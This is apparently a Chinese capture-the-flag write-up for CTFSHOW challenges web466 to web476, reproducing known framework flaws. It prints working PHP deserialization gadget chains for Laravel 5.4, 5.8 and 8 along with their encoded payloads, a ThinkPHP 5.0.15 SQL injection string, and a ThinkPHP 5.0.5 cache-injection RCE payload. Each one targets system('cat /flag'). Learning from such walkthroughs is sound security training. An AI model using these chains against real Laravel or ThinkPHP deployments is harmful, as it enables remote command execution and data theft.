发表CTFSHOW12 分钟读完 (大约1763个字)

CTFSHOW 框架复现 web466 - web476

题目列表

web466

参考文章:代码审计学习—Laravel5.4

做题前一定要先看一遍漏洞复现,自行跟着去验证一下

第一条链子因为Faker\Generator.php里有个__wakeup(),反序列化时会把formatters数组清空,用不了

所以这里我们用第二条链子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
namespace Illuminate\Validation {
    class Validator {
       public $extensions = [];
       public function __construct() {
            $this->extensions = ['' => 'system'];
       }
    }
}

namespace Illuminate\Broadcasting {
    use  Illuminate\Validation\Validator;
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Validator();
            $this->event = $cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

运行得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MzE6IklsbHVtaW5hdGVcVmFsaWRhdGlvblxWYWxpZGF0b3IiOjE6e3M6MTA6ImV4dGVuc2lvbnMiO2E6MTp7czowOiIiO3M6Njoic3lzdGVtIjt9fXM6ODoiACoAZXZlbnQiO3M6OToiY2F0IC9mbGFnIjt9

然后GET传入/admin/序列化数据即可

web467

参考文章:Laravel5.4 反序列化漏洞挖掘

这里面第一条链子和第二条链子在题目里面用不了

用第三条链子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
namespace Illuminate\Broadcasting
{
    use  Illuminate\Events\Dispatcher;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast($argv[1])));
}


namespace Illuminate\Events
{
    class Dispatcher
    {
       protected $listeners;
       public function __construct($event){
           $this->listeners=[$event=>['system']];
       }
    }
}

保存文件为1.php,在终端执行命令php 1.php "cat /flag",得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXERpc3BhdGNoZXIiOjE6e3M6MTI6IgAqAGxpc3RlbmVycyI7YToxOntzOjk6ImNhdCAvZmxhZyI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6ODoiACoAZXZlbnQiO3M6OToiY2F0IC9mbGFnIjt9

同样的,GET传入/admin/序列化数据得到flag

web468

参考文章:laravel5.4反序列化 - Shivers0x72

用第二个方法,也就是src/Illuminate/Support/Manager.php那个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
namespace Illuminate\Broadcasting
{
	use Illuminate\Notifications\ChannelManager;
	class PendingBroadcast
	{
		protected $events;
		public function __construct($cmd)
		{
			$this->events = new ChannelManager($cmd);
		}
	}
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));
}

namespace Illuminate\Notifications
{
	class ChannelManager
	{
		protected $app;
		protected $defaultChannel;
		protected $customCreators;
		public function __construct($cmd)
		{
			$this->defaultChannel = '1';
			$this->customCreators = array('1' => 'system'); 
			$this->app = $cmd;
		}
	}
}
?>

得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6Mzp7czo2OiIAKgBhcHAiO3M6OToiY2F0IC9mbGFnIjtzOjE3OiIAKgBkZWZhdWx0Q2hhbm5lbCI7czoxOiIxIjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntpOjE7czo2OiJzeXN0ZW0iO319fQ==

运行后会弹出一个调试页面,大概意思就是代码中尝试对一个字符串类型的变量调用对象的方法dispatch(),但是字符串类型本身没有dispatch()这个方法,所以导致错误

不影响,直接查看网页源码即可

web469

也是参考上一题的文章:laravel5.4反序列化 - Shivers0x72

用最后一个方法,也就是src/Faker/ValidGenerator.php那个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
namespace Illuminate\Broadcasting
{
	use Faker\ValidGenerator;
	class PendingBroadcast
	{
		protected $events;
		public function __construct($cmd)
		{
			$this->events = new ValidGenerator($cmd);
		}
	}
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));
}

namespace Faker
{
	use Faker\DefaultGenerator;
	class ValidGenerator
	{
		protected $maxRetries;
		protected $validator;
		protected $generator;
		public function __construct($cmd)
		{
			$this->generator = new DefaultGenerator($cmd);
			$this->maxRetries = 10000000;
			$this->validator = 'system';
		}
		
	}
}

namespace Faker
{
	class DefaultGenerator
	{
		protected $default;
		public function __construct($cmd)
		{
			$this->default = $cmd;
		}
	}
}
?>

得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEzOiIAKgBtYXhSZXRyaWVzIjtpOjEwMDAwMDAwO3M6MTI6IgAqAHZhbGlkYXRvciI7czo2OiJzeXN0ZW0iO3M6MTI6IgAqAGdlbmVyYXRvciI7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7czo5OiJjYXQgL2ZsYWciO319fQ==

web470

跟上题方法一样,传入

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEzOiIAKgBtYXhSZXRyaWVzIjtpOjEwMDAwMDAwO3M6MTI6IgAqAHZhbGlkYXRvciI7czo2OiJzeXN0ZW0iO3M6MTI6IgAqAGdlbmVyYXRvciI7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7czo5OiJjYXQgL2ZsYWciO319fQ==

得到flag

web471

参考文章:laravel5.8 反序列化漏洞复现

用方法一,但是最后的输出要改一下,改成base64编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection="cat /flag";
    }
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver="system";

    }
}
namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo base64_encode(serialize(new PendingBroadcast()));
}

运行得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7Tzo0MzoiSWxsdW1pbmF0ZVxGb3VuZGF0aW9uXENvbnNvbGVcUXVldWVkQ29tbWFuZCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319

运行后会弹出调试页面,大概意思是在调用 dispatchToQueue 方法时,尝试通过队列解析器(queueResolver)来获取一个队列实例(Queue对象),但实际得到的不是实现了 Queue 接口的对象,而是其他类型(如字符串、null或其他非队列对象)

但是不影响命令执行,查看网页源码

web472

可以继续用上题的payload,也可以学学新思路,但感觉方法都差不多

版本升到laravel8了,参考文章:Laravel 8 反序列化分析_laravel dispatch

要改一下格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php

namespace Illuminate\Broadcasting {
    use Illuminate\Contracts\Events\Dispatcher;

    class PendingBroadcast
    {
        protected $event;
        protected $events;

        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
}

namespace Illuminate\Bus {
    class Dispatcher
    {
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace Illuminate\Broadcasting {
    class BroadcastEvent
    {
        public $connection;

        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}

namespace {
    $c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
    $a = new Illuminate\Bus\Dispatcher('system');
    $b = new Illuminate\Broadcasting\PendingBroadcast($a, $c);
    echo base64_encode(serialize($b));
}

得到结果

1
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6OToiY2F0IC9mbGFnIjt9czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9fQ==

同样也是GET传入/admin/序列化数据

web473

参考文章:ThinkPHP 5.0.15 SQL注入漏洞

题目给出了thinkphp5.0.15默认控制器的部分代码,使用默认路由

1
2
3
4
5
6
public function inject(){
     $a=request()->get('a/a');
     db('users')->insert(['username'=>$a]);
     return 'done';
    
    }

然后payload要改为

1
?a[0]=inc&a[1]=(select load_file('/flag'))&a[2]=1

我们用兼容模式传入路径

1
/index.php?s=index/index/inject&a[0]=inc&a[1]=(select load_file('/flag'))&a[2]=1

兼容模式也就是index.php?s=模块/控制器/方法&参数,当然还有pathinfo模式,通过index.php/模块/控制器/方法?参数 形式传递,但是这里我用pathinfo模式失败了

得到flag

web474

参考文章:Thinkphp cache缓存函数远程代码执行漏洞

题目给出thinkphp5.0.5默认控制器的部分代码,使用默认路由

1
2
3
4
public function rce(){
        Cache::set("cache",input('get.cache'));
        return 'done';
    }

payload:

1
public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//

写入之后我们要访问文件,因为cache的md5值为0fea6a13c52b4d4725368f24b045ca84,根据文章可知,文件的存放路径为/runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php,我们拼接访问该路径

得到flag

web475

后面两题题目备注thinkphp 5.0.0-5.0.23 rce,范围很大,可以自行测试Poc,这里我直接用工具做了

下载地址:bewhale/thinkphp_gui_tools: ThinkPHP漏洞综合利用工具

先检测看存在什么类型漏洞,然后一个个尝试,扫描/public/index.php不行,要扫描目录/public

得到flag

web476

跟上面一样

CTFSHOW 框架复现 web466 - web476

https://waynejoon.github.io/posts/ctfshow-framework-exploits-web466-web476/

作者

WayneJoon.H

发布于

2025-09-12

许可协议

 
关注我

目录

×